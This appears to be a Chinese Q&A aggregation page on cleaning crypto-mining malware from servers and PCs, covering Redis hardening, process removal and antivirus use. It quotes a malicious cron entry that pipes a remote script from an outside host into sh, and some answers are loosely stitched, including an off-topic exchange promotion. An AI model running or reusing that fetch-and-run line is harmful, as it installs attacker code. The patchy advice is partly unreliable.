怎麼清除電腦挖礦程序
Ⅰ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
Ⅱ 怎樣 刪除 mineros.exe 這種挖礦程序
最近一台安裝了Gitlab的伺服器發生了高負載告警,Cpu使用情況如下:
讓後登錄到伺服器,利用top查看CPU使用情況,這個叫minerd的程序消耗cpu較大,如下圖所示:
這個程序並不是我們的正常服務程序,心裡一想肯定被黑了,然後就搜索了一下這個程序,果真就是個挖礦木馬程序,既然已經知道他是木馬程序,那就看看它是怎麼工作的,然後怎麼修復一下後門。
這個程序放在/opt/minerd下,在確定跟項目不相關的情況下判斷是個木馬程序,果斷kill掉進程,然後刪除/opt下minerd文件。
展
Ⅲ 電腦好像中了JS網頁挖礦木馬了,怎麼辦
先用360安全衛士全盤木馬查殺一下!如果不徹底
可以重啟電腦,過四秒鍾
按
F8按,
進入安全模式下用360系統急救箱它對各類流行的頑固木馬查殺效果極佳,能夠強力清除木馬和可疑程序,並修復被感染的系統文件,抑制木馬再生,修復系統功能!
Ⅳ tasklsv.exe挖礦病毒如何徹底清除
請勿訪問陌生網站,在陌生網站瀏覽、下載很可能導致中毒。
若電腦中存在木馬或者病毒程序,安裝一款安全軟體(例如:電腦管家等)。使用安全軟體進行掃描全盤即可發現病毒並刪除。若無法處理或者出現錯誤請嘗試備份重要資料後重新安裝系統。
若手機中存在木馬或者病毒程序,安裝一款安全軟體(例如:手機管家等)。以手機管家為例,打開手機管家,點擊主界面上的一鍵體檢即可自動檢測手機中存在的病毒,點擊一鍵清除即可刪除。
Ⅳ miner挖礦木馬該怎麼清除
miner挖礦木馬這種病毒現在經常遇到,在一般情況下使用電腦管家的殺毒功能時無法查殺。
這時需要重啟電腦按F8進入電腦的安全模式,在安全模式下,使用電腦管家的病毒查殺,給電腦殺毒,在一般情況下的殺毒軟體可以查殺到此病毒。
miner挖礦木馬是消耗用戶的電腦資源,進行挖礦,導致用戶電腦資源和性能變低,一般看不出來,但是顯卡或CPU佔用很高,是電腦後台自行消耗顯卡與CPU資源的木馬病毒。現在十分常見。
Ⅵ 挖礦病毒怎麼處理
挖礦病毒處理步驟如下:
1、查看伺服器進程運行狀態查看伺服器系統整體運行情況,發現名為kdevtmpfsi的挖礦進程大量佔用系統CPU使用率。
2、查看埠及外聯情況查看埠開放狀態及外聯情況,發現主機存在陌生外聯行為。對該外部地址進行查詢發現屬於國外地址,進一步確定該進程為惡意挖礦進程:定位挖礦進程及其守護進程PID挖礦病毒kdevtmpfsi在運行過程中不僅會產生進程kdevtmpfsi。
6、查看redis日誌通過查看redis配置文件/etc/redis.conf發現日誌功能未開啟。
7、查找敏感文件發現authorized_keys文件。
8、查看ssh日誌文件查看ssh日誌文件,發現大量登陸痕跡以及公鑰上傳痕跡。
Ⅶ 電腦被挖礦了怎麼解決
用殺毒軟體在安全模式解決 想徹底解決還是用Pe重裝系統清除挖礦
Ⅷ 顯卡bios被共享挖礦了咋辦
殺毒軟體或者是重裝一下系統
投資者如果不知道電腦被別人挖礦怎麼解決,可以首先打開任務管理器,這個時候看到內存應該是專用內存集指的就是某個進程當中的內存,事實上還會有一個共享內存集裡面放著的便是關於共享的東西,主要就是看一下代碼,如果說出現了問題,就可能是病毒用什麼方式直接占據或者是隱藏的內存,這個時候可以直接更換系統或者是殺毒了。如果投資者不知道如何處理,可以來到OKLink瀏覽器上學習一下專業知識,在OKLink瀏覽器中可以了解主流貨幣的動向及價格,也可學習到一些專業知識。
二.如何查看電腦是否被挖礦1.挖礦主要就是用一些比較好的顯卡,這樣在挖礦的過程中效率可以更高一些,所以投資者在監看時只需要看一下GPU或者是CPU的使用情況,就可以發現回到主頁面之後,可以直接右擊開始按鈕。然後在菜單裡面點擊任務管理器,進入管理器之後,先看一下運行程序當中的CPU使用率有沒有過高。2.了解了電腦被別人挖礦怎麼解決後,投資者一定要了解一下該怎麼看。在任務管理器中可以直接點擊性能這個選項,在進入選項之後可以點擊下面的GPU,一般來說可以有兩個,分別是集成的顯卡和獨立的。在正常情況下多辦顯卡顯示的利用率都比較低,除了一些大型的游戲軟體,才可以把獨立的顯卡給調出來。接著可以看獨立顯卡,一般在默認的情況下這種顯卡根本用不到,在啟動游戲時利用率會特別高,如果這個時候確實很高,那麼投資者的電腦就是正在被挖礦中
Ⅸ 電腦被挖礦了怎麼恢復!求助!(已經卸載並且將其殺毒)
重裝一遍系統,就完全恢復了
任何挖坑都需要安裝軟體的,重裝系統,這些軟體都消失了
本質上挖坑,其實就是運行某個軟體,如果不是本人安裝,都是通過木馬安裝的
Ⅹ 中了挖礦木馬,我是如何清理的
目前挖礦木馬還沒辦法查殺,即使是2020年6月的現在,市面上所有的安全衛士都沒辦法識別出來。這個木馬非常狡猾,通過區域網共享傳播,感染之後會在本地生成一個合法程序(powershell命令形式的),然後木馬程序會自動刪除,這也是安全衛士沒辦法查殺的原因吧。我曾經翻過整個C盤,都沒辦法找出源文件,只能重裝系統了。